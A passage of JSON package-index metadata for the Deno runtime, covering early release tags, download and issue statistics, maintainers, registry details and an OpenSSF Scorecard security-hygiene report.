ases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:23:36.878Z","dependent_packages_count":3,"downloads":6898408,"downloads_period":"total","dependent_repos_count":316,"rankings":{"downloads":2.8701692797429565,"dependent_repos_count":2.307143069645673,"dependent_packages_count":9.156213942755052,"stargazers_count":12.09799779847083,"forks_count":9.989577129243598,"docker_downloads_count":3.236226684728404,"average":6.609554650764419},"purl":"pkg:cargo/deno_ops","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_ops","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_ops","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_ops/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-09-10T08:59:25.469Z","updated_at":"2025-09-10T08:59:25.469Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:26.978Z","updated_at":"2023-07-18T22:41:26.978Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":3689139,"name":"github.com/denoland/deno","ecosystem":"go","description":"","homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"github.com/denoland","versions_count":396,"first_release_published_at":"2018-08-17T16:58:58.000Z","latest_release_published_at":"2026-08-27T15:15:58.000Z","latest_release_number":"v2.9.6+incompatible","last_synced_at":"2026-08-29T21:56:51.978Z","created_at":"2022-04-11T11:22:57.045Z","updated_at":"2026-08-29T21:56:51.978Z","registry_url":"https://pkg.go.dev/github.com/denoland/deno","install_command":"go get github.com/denoland/deno","documentation_url":"https://pkg.go.dev/github.com/denoland/deno#section-documentation","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: 